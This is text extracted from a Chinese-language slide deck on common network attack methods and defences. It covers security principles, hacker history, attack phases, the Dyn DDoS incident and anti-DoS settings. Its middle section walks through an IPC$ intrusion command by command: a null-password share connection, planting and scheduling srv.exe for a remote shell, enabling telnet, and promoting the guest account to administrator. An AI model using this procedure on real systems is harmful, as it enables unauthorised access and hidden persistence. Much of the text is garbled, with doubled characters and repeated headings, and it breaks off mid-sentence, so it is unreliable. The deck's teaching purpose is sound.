网络攻击的常见手段与防范措施.ppt

1、网络攻击的常见手段网络攻击的常见手段 与防范措施与防范措施01什么是网络安全？什么是网络安全？02网络安全的主要特性网络安全的主要特性目录一、计算机网络安全的概念什么是网络安全？什么是网络安全？网络安全：网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。网络安全的主要特性网络安全的主要特性保密性信息不泄露给非授权用户、实体或过程，或供其利用的特性。完整性数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。可用性可被授权实体访问并按需求使用的特性。即当需要时能

2、否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击；可控性对信息的传播及内容具有控制能力。可审查性出现安全问题时提供依据与手段01入侵技术的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录二、常见的网络攻击黑客黑黑客客是是程程序序员员，掌掌握握操操作作系系统统和和编编程程语语言言方方面面的的知知识识，乐乐于于探探索索可可编编程程系系统统的的细细节节，并并且且不不断断提提高高自自身身能能力力，知知道道系系统统中中的的漏漏洞洞及其原因所在。专业黑客都是很有才华的源代码创作者。及其原因所在。专业黑客都是很

3、有才华的源代码创作者。起源：起源：2020世纪世纪6060年代年代目的：目的：基于兴趣非法入侵基于兴趣非法入侵 基于利益非法入侵基于利益非法入侵 信息战信息战Kevin Mitnick凯凯文文 米米特特尼尼克克是是世世界界上上最最著著名名的的黑黑客客之之一，第一个被美国联邦调查局通缉的黑客。一，第一个被美国联邦调查局通缉的黑客。19791979年年，1515岁岁的的米米特特尼尼克克和和他他的的朋朋友友侵侵入入了北美空中防务指挥系统了北美空中防务指挥系统。莫里斯蠕虫（Morris WormMorris Worm）时间时间19881988年年肇事者肇事者罗罗伯伯特特塔塔潘潘莫莫里里斯斯,美美国国康

4、康奈奈尔尔大大学学学学生生，其其父父是美国国家安全局安全专家是美国国家安全局安全专家机理机理利利用用sendmail,sendmail,finger finger 等等服服务务的的漏漏洞洞，消消耗耗CPUCPU资资源源，拒绝服务拒绝服务影响影响InternetInternet上上大大约约60006000台台计计算算机机感感染染，占占当当时时Internet Internet 联网主机总数的联网主机总数的10%10%，造成，造成96009600万美元的损失万美元的损失黑黑客客从从此此真真正正变变黑黑，黑黑客客伦伦理理失失去去约约束束，黑黑客客传传统统开开始中断。始中断。2001年中美黑客大战事件

5、背景和经过中美军机南海4.1撞机事件为导火线4月初，以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了“五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道，评论，中旬结束大战PoizonB0 xPoizonB0 x、pr0phetpr0phet更改的网页更改的网页中经网数据有限公司中经网数据有限公司中国科学院心理研究所中国科学院心理研究所国内某政府网站国内某政府网站国内某大型商业网

6、站国内某大型商业网站国内黑客组织更改的网站页面美国劳工部网站美国劳工部网站美国某节点网站美国某节点网站美国某大型商业网站美国某大型商业网站美国某政府网站美国某政府网站这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统，这个行动在技术上是没有任何炫耀和炒作的价值的。”主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞用户名泄漏，缺省安装的系统用户名和密码Unicode 编码可穿越firewall,执行黑客指令ASP源代码泄露可远

7、程连接的数据库用户名和密码SQL server缺省安装微软Windows 2000登录验证机制可被绕过Bind 远程溢出，Lion蠕虫SUN rpc.sadmind 远程溢出，sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞拒绝服务(syn-flood,ping)1980198019851985199019901995199520002000密码猜测密码猜测可自动复制的代码可自动复制的代码密码破解密码破解利用已知的漏洞利用已知的漏洞破坏审计系统破坏审计系统后门后门会话劫持会话劫持擦除痕迹擦除痕迹嗅探嗅探包欺骗包欺骗GUIGUI远程控制远程控制自动探测扫描自动探测扫描拒绝服务

8、拒绝服务www www 攻击攻击工具工具攻击者攻击者入侵者水平入侵者水平攻击手法攻击手法半开放隐蔽扫描半开放隐蔽扫描控制台入侵控制台入侵检测网络管理检测网络管理DDOS DDOS 攻击攻击20022002高高入侵技术的发展01入侵技术的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录常见的攻击方法常见的攻击方法端口扫描：网络攻击的前奏网络监听：局域网、HUB、ARP欺骗、网关设备邮件攻击：邮件炸弹、邮件欺骗网页欺骗：伪造网址、DNS重定向密码破解：字典破解、暴力破解、md5解密漏洞攻击：溢出攻击、系统漏洞利用种植木马：隐蔽、免杀、网站挂马、

9、邮件挂马DoS、DDoS：拒绝服务攻击、分布式拒绝服务攻击cc攻击：借助大量代理或肉鸡访问最耗资源的网页XSS跨站攻击、SQL注入：利用变量检查不严格构造javascript语句挂马或获取用户信息，或构造sql语句猜测表、字段以及管理员账号密码社会工程学：QQ数据库被盗端口端口判断判断判断判断系统系统选择选择最简最简方式方式入侵入侵分析分析可能可能有漏有漏洞的洞的服务服务获取获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装多个多个系统系统后门后门清除清除入侵入侵脚印脚印攻击其攻击其他系统他系统获取敏获取敏感信息感信息作为其作为其他用途他用途常见的系统入侵步骤IP地址、主机是否运

10、行、到要入侵点的路由、主机操作系统与用户信息等。攻击步骤攻击步骤1.1.1.1.收集主机信息收集主机信息收集主机信息收集主机信息Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法：应用的方法：获取网络服务的端口作为入侵通道。2.2.端口扫描端口扫描1.TCP Connect()2.TCP SYN3.TCP FIN4.IP段扫瞄5.TCP反向Iden

11、t扫瞄6.FTP代理扫瞄7.UDP ICMP不到达扫瞄7 7种扫瞄类型：种扫瞄类型：3 3、系统漏洞利用、系统漏洞利用 一次利用一次利用ipc$ipc$的入侵过程的入侵过程1.C:net use x.x.x.xIPC$“”/user:“admintitrator”用“流光”扫的用户名是administrator，密码为“空”的IP地址2.C:copy srv.exe x.x.x.xadmin$先复制srv.exe上去，在流光的Tools目录下3.C:net time x.x.x.x 查查时间，发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00，命令成功完成。4.C:at x

12、.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间推后）5.C:net time x.x.x.x再查查时间到了没有，如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05，那就准备开始下面的命令。6.C:telnet x.x.x.x 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了7.C:cop

13、y ntlm.exe 127.0.0.1admin$ntlm.exe也在流光的Tools目录中8.C:WINNTsystem32ntlm 输入ntlm启动（这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务)9.Telnet x.x.x.x，接着输入用户名与密码就进入对方了10.C:net user guest/active:yes 为了方便日后登陆,将guest激活并加到管理组11.C:net user guest 1234 将Guest的密码改为123412.C:net l

14、ocalgroup administrators guest/add 将Guest变为Administrator01入侵技术的历史和发展入侵技术的历史和发展02一般攻击步骤一般攻击步骤03攻击实例与攻击方式攻击实例与攻击方式目录北京时间10月22日凌晨，美国域名服务器管理服务供应商Dyn宣布，该公司在当地时间周五早上遭遇了DDoS（分布式拒绝服务）攻击，从而导致许多网站在美国东海岸地区宕机，Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。Dyn称，攻击由感染恶意代码的设备发起，来自全球上千万IP地址

15、，几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。1、DDoS（分布式拒绝服务）攻击攻击现象被攻击主机上有大量等待的TCP连接；网络中充斥着大量的无用的数据包；源地址为假 制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯；利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求，使主机无法处理所有正常请求；严重时会造成系统死机。分布式拒绝服务攻击分布式拒绝服务攻击分布式拒绝服务攻击分布式拒绝服务攻击：借助于C/S（客户/服务器）技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，从而成倍地提高拒绝服务攻击的威力分布式拒绝服务攻击分布式拒绝服务攻

16、击分布式拒绝服务攻击分布式拒绝服务攻击攻击流程1、搜集资料，被攻击目标主机数目、地址情况，目标主机的配置、性能，目标的宽带。2、是占领和控制网络状态好、性能好、安全管理水平差的主机做傀儡机。3、攻击者在客户端通过telnet之类的常用连接软件，向主控端发送发送对目标主机的攻击请求命令。主控端侦听接收攻击命令，并把攻击命令传到分布端，分布端是执行攻击的角色，收到命令立即发起flood攻击。主机设置所有的主机平台都有抵御DoS的设置，基本的有：1、关闭不必要的服务2、限制同时打开的Syn半连接数目3、缩短Syn半连接的time out 时间4、及时更新系统补丁网络设置1.防火墙禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。2.路由器设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log server防范措施雅虎作为美国著名的互联网门户网站，也是20世纪末互联网奇迹的创造者之一。然而在2013年8月20日，中国雅虎邮箱宣布停止提供